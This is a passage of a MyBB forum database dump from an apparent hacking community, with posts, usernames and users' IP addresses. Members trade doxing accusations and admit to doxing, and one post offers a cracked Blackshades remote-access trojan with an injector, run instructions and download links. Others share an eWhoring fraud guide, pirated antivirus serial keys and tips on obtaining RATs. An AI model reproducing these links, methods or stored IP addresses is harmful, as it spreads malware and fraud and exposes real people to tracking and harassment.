surprised if you even knew what a database was.\nIronically, I failed to mention that the information in the DOX you made was also completely inaccurate.\n\nIpod confirmed that the DOX was worthless, and he didn\'t seem too worried.\nHowever, I had nothing to do with the site going down, as I have said. I can keep my story straight.\n\nI haven\'t lied to anybody, however, you have lied to plenty of people.\n[/quote]\n\nYou\'re a pussy son. You think you can get things worked out by acting all good? If I don\'t know what a database is then how the heck am I running L33THacking?\n\nIf Ipods information is inaccurate then why was he requesting me to remove it? Even if it is inaccurate his IP address shows the correct location.\n\nYour next reply should be the last reply then your are most welcome to leave.', '72.231.24.165', '1223104677', '1', '0', '1', '1349754534', '1', '8009e272c8a2157be32af2955778b284', '0', '1349754534'); INSERT INTO mybb_posts VALUES('4009', '701', '3894', '49', 'RE: Change Font in Logo?', '0', '1', 't3h jok3r', '1349754677', '[quote=\'BreShiE\' pid=\'3894\' dateline=\'1349668954\']\r\nI think it\'ll be better if the font was the same as the one in your signature.\r\n[/quote]\r\n\r\nI agree and the icon resized. I just can\'t get the logo centered, do you have any idea how? I tried my best also tried all MyBB Community suggestions. I believe I need to edit the global.php file.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'd0207e7ac4fdb728d08bf2cf248aa0c6', '0', '0'); INSERT INTO mybb_posts VALUES('4010', '747', '4008', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '246', 'The Anarchist', '1349755069', '[quote=\'t3h jok3r\' pid=\'4008\' dateline=\'1349754505\']\r\n[quote=\'The Anarchist\' pid=\'4007\' dateline=\'1349754314\']\r\n[quote=\'t3h jok3r\' pid=\'4006\' dateline=\'1349754068\']\r\n[quote=\'The Anarchist\' pid=\'4005\' dateline=\'1349753806\']\r\n[quote=\'t3h jok3r\' pid=\'4002\' dateline=\'1349753495\']\r\n\r\nOh no not at all. I will allow to create as much accounts you want to because from most of the accounts you are posting which helps increase my forums activity and when it comes to accounts I keep merging it into one account so I\'m not losing anything actually gaining so why stop you?\r\n\r\nI did it because you or one of your member DDoSed my website. I created a 50% DOX of a member that YOU stole. A member who is now your loyal member. I lost iTzIpod and his friendship but I was never emotionally attached so I don\'t mind if he leaves or not. You are doing exactly what he did on my forum, you are going to use him to get more activity but a website is only successful by active members willing to contribute. You have around 300 posts and only around 10 come online daily and your top poster of the day has 3 posts? What a shame.\r\n\r\nIf you don\'t like me or my forum then leave.\r\n\r\nActually I can do anything with your IP because Brazil is not a hard country to SE.\r\n[/quote]\r\n\r\nApparently you\'re sourly mistaken on what this thread is about. This thread is about how you sca-mmed me, DOXed a member on your own forum, and lied about it.\r\n\r\nWhy are you being so honest now? Not too long ago you said you had nothing to do with it. \r\nIn fact, you were telling everybody that I had DOXed Ipod. When I spoke to Ipod, he explained that you did it.\r\n\r\nWhy bother lying if you can\'t keep your story straight?\r\nThis thread is about you, and your terrible qualities as a leader, not my site.\r\n\r\n(Also, our top poster does NOT have 3 posts)\r\n[/quote]\r\n\r\nWrong this is a thread about you lying, your childish acts and who was behind our site going down.\r\n\r\nTodays most posts by Hardz was 3 and that thing came up in \"Todays Top Posters\" .\r\n\r\nI told Ipod straight that I had DOXed him and last time I checked he is a member of your site. All my members know who I am and they can trust me. iTzIpod can never stay on a website, ask the owner of theprofiters of who I am and who is Ipod.\r\n\r\nBitches had their DB exploited for stealing my members and Ipod left TP because he never stays on a site for long.\r\n[/quote]\r\n\r\nI would be surprised if you even knew what a database was.\r\nIronically, I failed to mention that the information in the DOX you made was also completely inaccurate.\r\n\r\nIpod confirmed that the DOX was worthless, and he didn\'t seem too worried.\r\nHowever, I had nothing to do with the site going down, as I have said. I can keep my story straight.\r\n\r\nI haven\'t lied to anybody, however, you have lied to plenty of people.\r\n[/quote]\r\n\r\nYou\'re a pu-ssy son. You think you can get things worked out by acting all good? If I don\'t know what a database is then how the heck am I running L33THacking?\r\n\r\nIf Ipods information is inaccurate then why was he requesting me to remove it? Even if it is inaccurate his IP address shows the correct location.\r\n\r\nYour next reply should be the last reply then your are most welcome to leave.\r\n[/quote]\r\n\r\nI don\'t think there\'s much else to say. :roflol:\r\nWhenever I show any sign of a legitimate argument, you resort to childish namecalling, or immature remarks.\r\n\r\nAs far as IP addresses and DOXes, it looks like that\'s all you\'ll ever amount to in terms of threats.\r\nI hope your members take a closer look at who\'s running the forum they are using, even if they don\'t plan on using ours.\r\n\r\nBe sure to leave these posts, so your users can read what I have said. I won\'t return unless the need arises, so if you want to contact me use Skype.', '108.171.103.234', '1823172586', '0', '0', '0', '0', '1', '2086878dbdf0a4ec96f02df51a5e5279', '0', '0'); INSERT INTO mybb_posts VALUES('4011', '747', '4010', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '1', 't3h jok3r', '1349755189', '[quote=\'The Anarchist\' pid=\'4010\' dateline=\'1349755069\']\r\n[quote=\'t3h jok3r\' pid=\'4008\' dateline=\'1349754505\']\r\n[quote=\'The Anarchist\' pid=\'4007\' dateline=\'1349754314\']\r\n[quote=\'t3h jok3r\' pid=\'4006\' dateline=\'1349754068\']\r\n[quote=\'The Anarchist\' pid=\'4005\' dateline=\'1349753806\']\r\n\r\nApparently you\'re sourly mistaken on what this thread is about. This thread is about how you sca-mmed me, DOXed a member on your own forum, and lied about it.\r\n\r\nWhy are you being so honest now? Not too long ago you said you had nothing to do with it. \r\nIn fact, you were telling everybody that I had DOXed Ipod. When I spoke to Ipod, he explained that you did it.\r\n\r\nWhy bother lying if you can\'t keep your story straight?\r\nThis thread is about you, and your terrible qualities as a leader, not my site.\r\n\r\n(Also, our top poster does NOT have 3 posts)\r\n[/quote]\r\n\r\nWrong this is a thread about you lying, your childish acts and who was behind our site going down.\r\n\r\nTodays most posts by Hardz was 3 and that thing came up in \"Todays Top Posters\" .\r\n\r\nI told Ipod straight that I had DOXed him and last time I checked he is a member of your site. All my members know who I am and they can trust me. iTzIpod can never stay on a website, ask the owner of theprofiters of who I am and who is Ipod.\r\n\r\nBitches had their DB exploited for stealing my members and Ipod left TP because he never stays on a site for long.\r\n[/quote]\r\n\r\nI would be surprised if you even knew what a database was.\r\nIronically, I failed to mention that the information in the DOX you made was also completely inaccurate.\r\n\r\nIpod confirmed that the DOX was worthless, and he didn\'t seem too worried.\r\nHowever, I had nothing to do with the site going down, as I have said. I can keep my story straight.\r\n\r\nI haven\'t lied to anybody, however, you have lied to plenty of people.\r\n[/quote]\r\n\r\nYou\'re a pu-ssy son. You think you can get things worked out by acting all good? If I don\'t know what a database is then how the heck am I running L33THacking?\r\n\r\nIf Ipods information is inaccurate then why was he requesting me to remove it? Even if it is inaccurate his IP address shows the correct location.\r\n\r\nYour next reply should be the last reply then your are most welcome to leave.\r\n[/quote]\r\n\r\nI don\'t think there\'s much else to say. :roflol:\r\nWhenever I show any sign of a legitimate argument, you resort to childish namecalling, or immature remarks.\r\n\r\nAs far as IP addresses and DOXes, it looks like that\'s all you\'ll ever amount to in terms of threats.\r\nI hope your members take a closer look at who\'s running the forum they are using, even if they don\'t plan on using ours.\r\n\r\nBe sure to leave these posts, so your users can read what I have said. I won\'t return unless the need arises, so if you want to contact me use Skype.\r\n[/quote]\r\n\r\nYou already sucked my dick too much, I don\'t off course want you back. So now I believe you are out of my way and I\'m out of your way. You run the forum the way you want and I will do the same with my forum.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'daf7f120d83c66665d2211e735703ede', '0', '0'); INSERT INTO mybb_posts VALUES('4012', '776', '0', '16', 'What are some things you want SE\'d?', '0', '222', 'Exposé', '1349758573', 'What things do you guys want SE\'d. And not things that already have methods. As being the leader of fearless, I personally would like to bring LH members the best methods.\r\n\r\nSo give me suggestions and I will start working on them :D', '69.205.61.93', '1171078493', '1', '0', '0', '0', '1', 'cd9dff70c249e2cdde15e97cc5b910ee', '0', '0'); INSERT INTO mybb_posts VALUES('4013', '741', '3766', '9', 'RE: 7 Videos That Will Show You How To Make Real Income Online!', '0', '213', 'BitMonst3r', '1349758717', 'There is a lot of members who use this :)', '178.250.34.208', '-1292229936', '0', '0', '0', '0', '1', '6de37cfce4c051ba5b4655f3fb77fccc', '0', '0'); INSERT INTO mybb_posts VALUES('4014', '747', '3809', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '222', 'Exposé', '1349758803', 'Nicely said Joker...let\'s just move on and all stop acting like 6 yr olds k?', '69.205.61.93', '1171078493', '1', '0', '222', '1349758820', '1', '0820c4bc09e6cdc00f160b3613a66d4e', '0', '1349758820'); INSERT INTO mybb_posts VALUES('4015', '451', '2111', '19', '[Junk][Junk][Recently Created]Free working shell booter', '0', '1', 't3h jok3r', '1349761011', 'This thread has been junked.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO mybb_posts VALUES('4016', '747', '3809', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '249', 'Ultimatum', '1349764657', 'What the fuck is this? [A.Forums] is absolute bull shit. Just cause you guys don\'t have anything I\'ve seen here, doesn\'t give an excuse for you fucktards to go bringing your shit here.\n\nThe fucking Anarchist kicked me from the forums for NO reason. At least t3h jok3r isn\'t an asshole.', '121.215.220.45', '2044189741', '0', '0', '0', '0', '1', 'ba4934aba5d1fae3300c66a8fd90b424', '0', '0'); INSERT INTO mybb_posts VALUES('4017', '749', '3822', '4', 'RE: It\'s BreShiE!', '0', '53', 'sirchamp', '1349765051', 'The software is called wTools. wTools stands for WebTools. There are different things you can do with it. (IP Pinger, Host To Ip, Ip tracer, Cloudflare resolver, email spoofer and \"skype tools\"', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'b6975c6ab12df2d3d94e24f95ac06d06', '0', '0'); INSERT INTO mybb_posts VALUES('4018', '777', '0', '4', 'The Ultimatum has Arrived!', '0', '249', 'Ultimatum', '1349765088', 'Well, hey guys! This is Ultimatum and I\'m moving here because of that asshole Anarchist. Anyway, I\'ve known hacking since a bit less than 2 years ago. I can do pentesting such as, LFI, RFI, XSS (my favourite), SQLi, etc. \r\n\r\nI have a lot of experiences with booters and how they work, etc. I can do a little bit of VB.NET, C#, C++, PHP, HTML, and CSS.\r\n\r\nI\'m really hopeful with this forum, and things seem to have started well, and I seriously hope things are much better here than AnarchyForums.\r\n\r\n:)', '121.215.220.45', '2044189741', '0', '0', '0', '0', '1', '27d7335c7d123480cbdc599488baf62f', '0', '0'); INSERT INTO mybb_posts VALUES('4020', '701', '3584', '49', 'RE: Change Font in Logo?', '0', '62', 'R?????zo?', '1349769577', 'feel free to edit the logo, if you want the original .psd file I can provide it\nyou have my permision :)', '89.214.85.204', '1507218892', '1', '0', '0', '0', '1', 'cffa66270a7d14c3bbd2fc6c996ae67d', '0', '0'); INSERT INTO mybb_posts VALUES('4021', '763', '3891', '58', 'RE: [Announcement]Group Changes', '0', '62', 'R?????zo?', '1349769715', 'I will do my best to keep Unique active.', '89.214.85.204', '1507218892', '1', '0', '0', '0', '1', '8fff67c4ea7dfac8c359e2e2a7383736', '0', '0'); INSERT INTO mybb_posts VALUES('4022', '778', '0', '19', '[Junk]Gigbucks to Fiverr method', '0', '62', 'R?????zo?', '1349770109', '[align=center][size=large][color=yellow][b][i]Gigbucks to Fiverr Guide[/i][/b][/size][/color]\n\n\n\n\nDownload Link:\nhttp://www.mediafire.com/view/?b94c4h9dcflc54q\n\nI hope you\'ll earn from this.\n\nI take no credits for this.[/align]', '89.214.85.204', '1507218892', '1', '0', '62', '1349770212', '1', 'd5ce84d3c7ebb7e56af6433e6ad7a2df', '0', '1349770212'); INSERT INTO mybb_posts VALUES('4023', '779', '0', '61', 'Get everything for FREE', '0', '62', 'R?????zo?', '1349770474', '[align=center][color=#FFD700][size=large][i][b]How to get everything for free[/b][/i][/size][/color]\n\nThis requires abit of SE skills.\nAnyways heres the link: http://www.mediafire.com/?1975p54jnhkv6au\n\n\nCredits to Saga[/align]', '89.214.85.204', '1507218892', '1', '0', '62', '1349770513', '1', '09cabed9ed1428486ea386dc161ec3df', '0', '1349770513'); INSERT INTO mybb_posts VALUES('4024', '780', '0', '17', 'Ultimate eWhoring Guide ? Never Seen Before ? $800/week! ?', '0', '62', 'R?????zo?', '1349770825', 'Here\'s some really good guide.\nI made a few bucks doing this, just try it, you won\'t be dissapointed :)\n\nProof: \n[spoiler]http://img100.imageshack.us/slideshow/webplayer.php?id=1qa55.png[/spoiler]\n\nHeres the download link: http://dl.dropbox.com/u/57540058/eWhore%20Guide.pdf\n\n\nCredits goes to Tuxedo.', '89.214.85.204', '1507218892', '1', '0', '62', '1349771646', '1', 'e7f9f3f9035c36d6c4018a2dd195a527', '0', '1349771646'); INSERT INTO mybb_posts VALUES('4025', '781', '0', '61', '[LEAK] J0HNNYs ultimate Money Making Method $100-$200 daily!', '0', '62', 'R?????zo?', '1349771540', 'I\'ve actually tried this method and it has potential. You can earn good money doing this. I, personally made around $150 bucks doing this, i\'m not sure if it\'s saturated or not now but try it!\r\n\r\n__________________________________________________________________\r\n\r\nDOWNLOAD: http:/www.mediafire.com/?m4e1bsrdtrn294u\r\n\r\nVIRUS SCAN:\r\n\r\n[IMG]http://cache.gyazo.com//96399a1e0bc5f683cd551f707a60af0b.png?1349389789?1349389789[/IMG]', '89.214.85.204', '1507218892', '1', '0', '0', '0', '1', '4280a04b252fc7b71f289bac1b6ca3f3', '0', '0'); INSERT INTO mybb_posts VALUES('4026', '439', '2051', '58', 'RE: Unique - Recruitment', '0', '62', 'R?????zo?', '1349774115', 'I will be the one dealing with the applys in Unique from now on, feel free to apply if you think you meet the requirements.', '89.214.85.204', '1507218892', '1', '0', '0', '0', '1', '49664888ed606e954d80681c8d9e1b4f', '0', '0'); INSERT INTO mybb_posts VALUES('4027', '762', '3889', '58', 'RE: LH Coders: Official Group - Applications: OPEN', '0', '62', 'R?????zo?', '1349778014', '[color=#32CD32][b]What Can You Code:[/b][/color]\nC, mostly C#. Some VB, PHP, HTML, CSS, Java and lua.\n\n[b][color=#32CD32]Favorite Coding Language:[/color][/b]\nC#, I\'ve studied for 3years+ I\'ve had a job in that area, making health care programs.\n\n[color=#32CD32][b]Will You Give Support To Fellow Coders:[/b][/color]\nI will help you with whatever I can, I will help review your code, tell you tips & tricks etc.\n\n[color=#32CD32][b]How Many Hours Per Week Can You Be On:[/b][/color]\nI can be here like 8hours a day, some other days more or less, depends on my girlfriend :P\n\n[b][color=#32CD32]Age:[/color][/b]\n20', '89.214.85.204', '1507218892', '1', '0', '0', '0', '1', 'ba6137eecec15ef581ab497571181544', '0', '0'); INSERT INTO mybb_posts VALUES('4028', '769', '3944', '23', 'RE: Math Tools for all Subjects Cracked by Rave', '0', '53', 'sirchamp', '1349779235', 'Thanks, These cost a hell lot.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '42d90154e4f7edb65270838e8f6e7db5', '0', '0'); INSERT INTO mybb_posts VALUES('4029', '443', '2055', '42', 'RE: Apple Announces the iPhone 5', '0', '205', 'mothered', '1349783025', 'I don\'t think too highly of the Iphones, so I\'ll be doing some research on this.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'b1a5ab6492eff9d26d54cb7539610681', '0', '0'); INSERT INTO mybb_posts VALUES('4030', '762', '3889', '58', 'RE: LH Coders: Official Group - Applications: OPEN', '0', '100', '??zg???g????61', '1349784179', 'Lol I now I feel like a noob. \n\n[color=#32CD32][b]What Can You Code:[/b][/color]\nI\'ve been doing Java for about a year, I\'ve stopped learning Java actively but I have an understanding that can be easily improved. I know HTML, I\'ve been introduced to Javascript and I\'m JUST starting php.\n\n[b][color=#32CD32]Favorite Coding Language:[/color][/b]\nI think that would be Java. \n\n[color=#32CD32][b]Will You Give Support To Fellow Coders:[/b][/color]\nI can help develop ideas, as well as help with Java related problems or questions.\n\n[color=#32CD32][b]How Many Hours Per Week Can You Be On:[/b][/color]\nI can be on about 5-6 hours a week. Probably more but I can\'t really be sure.\n\n[b][color=#32CD32]Age:[/color][/b]\nAnonymous?\n\n[b][color=#32CD32]Proof Of Your Coding Abilities:[/color][/b]\nhttp://pastebin.com/u4YsgUzy \n\nI\'m going to remove this in like a week.\n\nThat was a quick guessing game I whipped up over the week end for my friend.', '70.192.2.128', '1186988672', '1', '0', '100', '1349909913', '1', '202ea1ec84f7f22fcec4415da2c2d73b', '0', '1349909913'); INSERT INTO mybb_posts VALUES('4031', '647', '3167', '14', 'RE: VPNReactor (Free/Paid) **Deletes Logs**', '0', '205', 'mothered', '1349784317', 'I\'ve used Hotspot Shield and CyberGhost, but not this.\r\n\r\nAppreciate the contribution, thanks.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'f12e0f9b4ac0bf58ffcbfe79d809af2d', '0', '0'); INSERT INTO mybb_posts VALUES('4033', '770', '3945', '19', 'RE: Gyzano JDB', '0', '61', 'NXK', '1349784460', 'Good to see more HF leaks, Maybe I should start posting all mine.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'bc5154c2a0da1043b99a0d07b05503ae', '0', '0'); INSERT INTO mybb_posts VALUES('4034', '50', '132', '12', 'RE: [tut]How to DOX', '0', '205', 'mothered', '1349784536', 'Very nice guide Indeed.\r\n\r\nThanking you.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '8ffc7c2eca4e9caad497db09d37c9f9d', '0', '0'); INSERT INTO mybb_posts VALUES('4035', '764', '3895', '15', 'RE: Hack Pack By Timmy | 2GB |', '0', '61', 'NXK', '1349784599', 'This is alot of stuff man, My folder is almost this big. Hopefully there\'s some nice stuff for members here.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'e60e9a6fcf7188ea5d8ed4a19a6a1ab8', '0', '0'); INSERT INTO mybb_posts VALUES('4036', '764', '3895', '15', 'RE: Hack Pack By Timmy | 2GB |', '0', '199', 'Anonymous™', '1349787707', 'Error (509)\nThis account\'s public links are generating too much traffic and have been temporarily disabled!', '85.230.51.22', '1441149718', '1', '0', '0', '0', '1', '77b03d4da3fccc9d6e2a517f89766bcd', '0', '0'); INSERT INTO mybb_posts VALUES('4038', '777', '4018', '4', 'RE: The Ultimatum has Arrived!', '0', '199', 'Anonymous™', '1349796007', 'Hello!\nWelcome to L33thacking Ultimatum...', '85.230.51.22', '1441149718', '1', '0', '0', '0', '1', 'fefaf0602c6d952179951867639f260f', '0', '0'); INSERT INTO mybb_posts VALUES('4039', '190', '665', '56', 'RE: Copy and paste game', '0', '199', 'Anonymous™', '1349796096', 'http://sphotos-e.ak.fbcdn.net/hphotos-ak-snc7/399654_525432087483184_363798693_n.jpg', '85.230.51.22', '1441149718', '1', '0', '0', '0', '1', '52c356ec1d8a8bcf6eeae5df01d0fb5f', '0', '0'); INSERT INTO mybb_posts VALUES('4040', '767', '3913', '74', 'RE: Do you cheat/hack games?', '0', '199', 'Anonymous™', '1349796284', 'Probably just hacking on minecraft.\n\n*Swag*', '85.230.51.22', '1441149718', '1', '0', '0', '0', '1', '968fa78f7eea78aef28a83c5b56ce991', '0', '0'); INSERT INTO mybb_posts VALUES('4041', '724', '3651', '74', 'RE: Cheese Cake Client', '0', '199', 'Anonymous™', '1349796345', 'I think that people want to see pictures and more info first.', '85.230.51.22', '1441149718', '1', '0', '0', '0', '1', '2a5a40862b1b191f50e33bbc1832d6ea', '0', '0'); INSERT INTO mybb_posts VALUES('4042', '697', '3554', '74', 'RE: Who plays Minecraft out here?', '0', '199', 'Anonymous™', '1349796393', 'I play minecraft it is a pretty fun game sometimes.', '85.230.51.22', '1441149718', '1', '0', '0', '0', '1', '4c969634509e216c1df3d417c0ea1e01', '0', '0'); INSERT INTO mybb_posts VALUES('4043', '777', '4018', '4', 'RE: The Ultimatum has Arrived!', '0', '100', '??zg???g????61', '1349798029', 'Welcome good sir ;D Anarchist sucks..', '178.209.51.79', '-1294912689', '1', '0', '0', '0', '1', 'b2a921362b021419997fa01b1be689b6', '0', '0'); INSERT INTO mybb_posts VALUES('4044', '745', '3798', '59', 'RE: [Leak] Huge Folder of Ebooks', '0', '100', '??zg???g????61', '1349798076', ':D glad you guys enjoyed it :D', '178.209.51.79', '-1294912689', '1', '0', '0', '0', '1', 'a078a98277d042119d880bd75a668929', '0', '0'); INSERT INTO mybb_posts VALUES('4045', '777', '4018', '4', 'RE: The Ultimatum has Arrived!', '0', '62', 'R?????zo?', '1349799585', 'welcome bro, stay HQ and active.', '31.22.168.19', '521578515', '1', '0', '0', '0', '1', '2819e82fb3efd0aab6abbbd4c92af009', '0', '0'); INSERT INTO mybb_posts VALUES('4046', '749', '3822', '4', 'RE: It\'s BreShiE!', '0', '62', 'R?????zo?', '1349799643', 'welcome to the community, stay active and HQ.', '31.22.168.19', '521578515', '1', '0', '0', '0', '1', '32a347f8091734c68a96e199059008af', '0', '0'); INSERT INTO mybb_posts VALUES('4047', '190', '665', '56', 'RE: Copy and paste game', '0', '62', 'R?????zo?', '1349799748', 'monetizekings\n\nNo idea where i copied from.', '31.22.168.19', '521578515', '1', '0', '0', '0', '1', '6551358bc5d5d4873c3b6b8d4344fade', '0', '0'); INSERT INTO mybb_posts VALUES('4048', '701', '3584', '49', 'RE: Change Font in Logo?', '0', '222', 'Exposé', '1349807764', 'Yeh joker I think I know how. I had that issue a while back. And yeh if someone can give me the psd I can make some changes', '69.205.61.93', '1171078493', '1', '0', '0', '0', '1', 'ac57ffb11df12909d1b2e3293035c544', '0', '0'); INSERT INTO mybb_posts VALUES('4049', '738', '3760', '43', 'RE: [LEAK] AVG 2013 Serial Keys', '0', '61', 'NXK', '1349809092', 'Nice contribution to anyone who uses a anti-virus. Good share I approve :)', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '4dd89322000cee41f11ec9e694f1cfaf', '0', '0'); INSERT INTO mybb_posts VALUES('4050', '747', '3809', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '222', 'Exposé', '1349809726', 'Lol another reason to come to LH....welcome hehe', '69.205.61.93', '1171078493', '1', '0', '0', '0', '1', 'ac1b262be7ac054ed7c4c7dcb2594f95', '0', '0'); INSERT INTO mybb_posts VALUES('4051', '190', '665', '56', 'RE: Copy and paste game', '0', '222', 'Exposé', '1349809953', 'http://www.publicdomainpictures.net/pictures/20000/velka/black-red-green-background.jpg', '69.205.61.93', '1171078493', '1', '0', '0', '0', '1', '0ed328ae265fc68a1263d78c3e28678c', '0', '0'); INSERT INTO mybb_posts VALUES('4052', '782', '0', '7', 'We need to advertise!', '0', '222', 'Exposé', '1349810253', 'Guys....we need to start advertising LH. The more members we have, the more content we have, and the better LH looks. So I urge everyone here to just pick a couple of forums or whatever you want and create threads about LH. If we can get people signing up then others will want to signup.\r\n\r\nOnce you create the thread post in in this thread and the members here at LH can bump up the threads....\r\n\r\nI am currently working on getting some advertising spots for LH :D', '69.205.61.93', '1171078493', '1', '0', '0', '0', '1', '858a761150d9cd56781fb1c037a93bbc', '0', '0'); INSERT INTO mybb_posts VALUES('4053', '190', '665', '56', 'RE: Copy and paste game', '0', '82', 'iTzIpod', '1349810572', 'This is what I copied + pasted www.theprofiters.com', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'facb87aecbfcea2ef52f926e03048b36', '0', '0'); INSERT INTO mybb_posts VALUES('4054', '783', '0', '49', 'Enable who\'s viewing thread....', '0', '222', 'Exposé', '1349810641', 'You should enabled the option where users can see who is viewing a thread at the same moment. I think it\'s nice to see who else is viewing a thread when you are :D', '69.205.61.93', '1171078493', '1', '0', '0', '0', '1', 'c6955e63ad3f2cf184a4e952683b9fc0', '0', '0'); INSERT INTO mybb_posts VALUES('4055', '734', '3733', '3', 'RE: Downtime, PMs and Members', '0', '82', 'iTzIpod', '1349810644', 'You took advantage of me. I knew that. -.-', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f9f751c863ead1d76f8c75b1f8e9a723', '0', '0'); INSERT INTO mybb_posts VALUES('4056', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '82', 'iTzIpod', '1349810696', 'Warnings don\'t do anything. Nothing happens when you get 100%..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ca3d941c6c90bc0f2dcaad322efa79af', '0', '0'); INSERT INTO mybb_posts VALUES('4057', '759', '3871', '7', 'RE: Join the LH Skype Group!', '0', '82', 'iTzIpod', '1349810731', 't3h jok3r doxed me. What do you expect me to do?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9927754117bb847d8151ed132362181e', '0', '0'); INSERT INTO mybb_posts VALUES('4058', '759', '3871', '7', 'RE: Join the LH Skype Group!', '0', '222', 'Exposé', '1349810820', 'Who cares if he doxed you lol. What\'s the big deal....nobody ever does anything with the dox\'s lol. You should just move on and keep being a part of LH or not...', '69.205.61.93', '1171078493', '1', '0', '0', '0', '1', 'e0c966ac666eff2a4509f8f8f110b8cc', '0', '0'); INSERT INTO mybb_posts VALUES('4059', '767', '3913', '74', 'RE: Do you cheat/hack games?', '0', '82', 'iTzIpod', '1349810837', 'Do \"Mods\" on Minecraft count as hacking?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'be9d1eeaf54f96eaa742d645ccf0e409', '0', '0'); INSERT INTO mybb_posts VALUES('4081', '747', '4016', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '1', 't3h jok3r', '1349824131', '[quote=\'Ultimatum\' pid=\'4016\' dateline=\'1349764657\']\r\nWhat the fuck is this? [A.Forums] is absolute bull shit. Just cause you guys don\'t have anything I\'ve seen here, doesn\'t give an excuse for you fucktards to go bringing your shit here.\r\n\r\nThe fucking Anarchist kicked me from the forums for NO reason. At least t3h jok3r isn\'t an asshole.\r\n[/quote]\r\n\r\n1. \"*Chuckles* The shit is still down. But I\'ll see what I can make up the 18 bucks and the 2 bucks I still ow yah Maybe from the booter, hopefully.\"\r\n\r\n2. \"Got kicked out\" and your last post on AF was 8 hours this post? \r\n\r\n[quote=\'The Anarchist\' pid=\'4066\' dateline=\'1349812648\']\r\n[quote=\'R?????zo?\' pid=\'4063\' dateline=\'1349811863\']\r\n[quote=\'The Anarchist\' pid=\'4060\' dateline=\'1349810934\']\r\nWhat an asshole! He banned me and posted my DOX too!\r\n[/quote]\r\n\r\n\r\nwhy do you even bother to make 300 accounts and get banned all the time? \r\njust GTFO of this forum and get a life.\r\n[/quote]\r\n\r\nI made maybe 3-4. It takes me less than a minute. Don\'t flatter yourself.\r\n\r\nAs for posts? I\'ve spent maybe a total of 20-30 minutes posting here, mainly to highlight the owner\'s actions.\r\nIt doesn\'t take much time out of my day, and it\'s really not that much activity.\r\n[/quote]\r\n\r\n\r\nThis clearly shows that you are immature and have no life. If I posted your DOX online then firstly prove it that it\'s online and secondly prove it that I posted it.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'a87009fbe7b17e7e974ddc1de1f786c0', '0', '0'); INSERT INTO mybb_posts VALUES('4159', '800', '0', '15', 'Blackshades v5.3 Cracked By The Old Warrior', '0', '203', 'NeonLights', '1349887315', '[align=center][img]http://2.bp.blogspot.com/-ohF9qNcBNdk/UHQIHVQbGpI/AAAAAAAAAsM/J9C7sXaHnBE/s400/images.jpeg[/img]\n\nThe Big surprise is\nBlackShades 5.3 Original First Release! (Backdoored) \n\nThe Old Warrior always Discover that Blackshades 5.3 was Backdoored At the same time create clean version Causing a great loss for the team of blackshades After paying big money to HF To remove Version\n\n This is the proof:\n\n[video=youtube]http://www.youtube.com/watch?feature=player_embedded&v=4y4E9HOXYY4[/video]\n\n*Updated Of The Old Warrior*\nAlright i took sometime to fix the errors File CRC etc\n\ni also added Logs.txt\npatching method is now better using function hooking (0xE9)\n\nHere is updated version\nInstructions:\n1.Extract in the BS Folder\n2.Double click Injector.exe\n3.Enjoy\n\nBlackshades v5.3 Cracked!\n\n[video=youtube]http://www.youtube.com/watch?feature=player_embedded&v=Izq5KZtgyKw[/video]\n\n[lock]\ndownload: http://adf.ly/382489/http://lh.rs/dNlunBhCIHwb\nmirror: http://adf.ly/382489/http://ge.tt/1ahCNAP/v/0\n[/lock]\n\nenjoy guys![/align]', '205.237.34.10', '-840097270', '1', '0', '1', '1352010934', '1', '2bfc35476433685a2e4024bf20ac40b6', '0', '1352010934'); INSERT INTO mybb_posts VALUES('4062', '747', '3809', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '222', 'Exposé', '1349811487', 'I thought nobody would be able to dox you lol?', '69.205.61.93', '1171078493', '1', '0', '0', '0', '1', '6460b3fe63ada605e628e5667720470a', '0', '0'); INSERT INTO mybb_posts VALUES('4063', '747', '3809', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '62', 'R?????zo?', '1349811863', '[quote=\'The Anarchist\' pid=\'4060\' dateline=\'1349810934\']\nWhat an asshole! He banned me and posted my DOX too!\n[/quote]\n\n\nwhy do you even bother to make 300 accounts and get banned all the time? \njust GTFO of this forum and get a life.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '505acc7ba88cf87191f6b5abb8bd2a04', '0', '0'); INSERT INTO mybb_posts VALUES('4161', '791', '4134', '7', 'RE: Are you a morning person?', '0', '222', 'Exposé', '1349895140', 'Awwwww hell no lol. Yeh I go to bed like 2 am and my first class is like 9am. Sucks...', '69.205.61.93', '1171078493', '1', '0', '0', '0', '1', 'aad8ba3cb371516f91d8702dc0c8f542', '0', '0'); INSERT INTO mybb_posts VALUES('4162', '800', '4159', '15', 'RE: Blackshades v5.3 Cracked By The Old Warrior', '0', '100', '??zg???g????61', '1349896348', 'Does this really work? if so thanks a ton :D', '178.209.51.79', '-1294912689', '1', '0', '0', '0', '1', '33bdce0c8c025b7b441ba0d1419d7050', '0', '0'); INSERT INTO mybb_posts VALUES('4163', '789', '4106', '19', 'RE: ratters', '0', '100', '??zg???g????61', '1349897096', 'Darkcomet is pretty LQ, if you have the money ($29.99 USD) buy paradox RAT. If not use one of the cracked ones posted here. :3', 